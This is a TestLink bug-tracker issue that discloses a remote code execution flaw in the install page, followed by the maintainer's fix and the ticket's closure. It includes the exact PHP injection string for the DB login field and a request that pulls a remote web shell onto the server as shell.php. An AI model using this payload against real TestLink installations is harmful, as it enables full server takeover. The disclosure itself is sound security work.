Mantis Bugtracker          
testlink.org

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0008209TestLinkSecurity - Generalpublic2018-02-23 05:472018-04-14 09:04
ReporterManish Tanwar 
Assigned Tofman 
PriorityurgentSeveritymajorReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version1.9.16 (2016 Q4) 
Fixed in Version1.9.17 (2018 Q1) 
Summary0008209: Remote Code Execution
DescriptionHello,

During code audit (version 1.9.14 and 1.9.17) i came to know about Remote Code Execution security issue.
This issue is on script installation page (install/installNewDB.php).
Once Script installation has been done, again user can perform re-installation by navigating to "/install/" directory. Script will ask for MySQL credentials and if user provide credentials of a MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username,password and need to specify "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" this PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname).
Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file.
After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters
testlink/config_db.inc.php?1=shell.php&2=http://remote_server/php_web_shell.txt [^]
It will dump PHP web shell in base directory with name shell.php.
Steps To Reproduce-> Navigate to "/install" directory.
-> Follow the instructions as per the installation page till we get web page in which we have to specify the MySQL server credentials.
-> Specify the Remote MySQL server IP, root user account username and password in Database Host, Database admin login and password fields respectively.
-> specify below mentioned PHP code in "Testlink db login" input field and any password in "TestLink DB password" input filed.
   box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//
-> Click "Process Testlink Setup" button and observe the response.
-> Open the "config_db.inc.php" file in text editor and observe that the file contains "define('DB_USER', 'box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//');" which is PHP code injection.
TagsNo tags attached.
Database (MySQL,Postgres,etc)MySQL
Browser
PHP Version
TestCaseID
QA Team - Task Workflow StatusREADY FOR TESTING
Attached Filespng file icon testlink POC.png [^] (171,492 bytes) 2018-02-23 05:47

- Relationships

-  Notes
(0027229)
fman (administrator)
2018-02-24 09:31

Thanks, going to check
(0027235)
fman (administrator)
2018-02-24 16:22

please get latest code from github, retest and provide feedback
(0027236)
fman (administrator)
2018-02-24 16:24

https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/9696012eecbafb0aa21cc346234512c29b474679 [^]
(0027240)
Manish Tanwar (reporter)
2018-02-24 17:58

Hello,

I have checked the patch applied, it seems fixed.
In case if i get any bypass, will register issue ticket.

I want to know how to get CVE ID for this security issue, if you can help me, please let me know.
Happy and Safe Coding.

Thank You
Manish
(0027241)
fman (administrator)
2018-02-24 18:01

can not help with CVE, never done
(0027242)
Manish Tanwar (reporter)
2018-02-24 18:02

That's fine i will check with someone else :)
So are you going to mention my name in next release for security bug fix?
(0027295)
fman (administrator)
2018-04-14 09:04

release 1.9.17

- Issue History
Date Modified Username Field Change
2018-02-23 05:47 Manish Tanwar New Issue
2018-02-23 05:47 Manish Tanwar File Added: testlink POC.png
2018-02-24 09:31 fman Note Added: 0027229
2018-02-24 16:22 fman Note Added: 0027235
2018-02-24 16:24 fman QA Team - Task Workflow Status => READY FOR TESTING
2018-02-24 16:24 fman Note Added: 0027236
2018-02-24 16:24 fman Status new => resolved
2018-02-24 16:24 fman Fixed in Version => 1.9.17 (2018 Q1)
2018-02-24 16:24 fman Resolution open => fixed
2018-02-24 16:24 fman Assigned To => fman
2018-02-24 17:58 Manish Tanwar Note Added: 0027240
2018-02-24 18:01 fman Note Added: 0027241
2018-02-24 18:01 Manish Tanwar Note View State: 0027240: private
2018-02-24 18:02 Manish Tanwar Note Added: 0027242
2018-02-24 18:03 Manish Tanwar Note View State: 0027242: private
2018-02-24 18:40 Manish Tanwar Note View State: 0027240: public
2018-02-24 18:40 Manish Tanwar Note View State: 0027242: public
2018-02-25 13:42 fman View Status private => public
2018-04-14 09:04 fman Note Added: 0027295
2018-04-14 09:04 fman Status resolved => closed



Copyright © 2000 - 2018 MantisBT Team
Powered by Mantis Bugtracker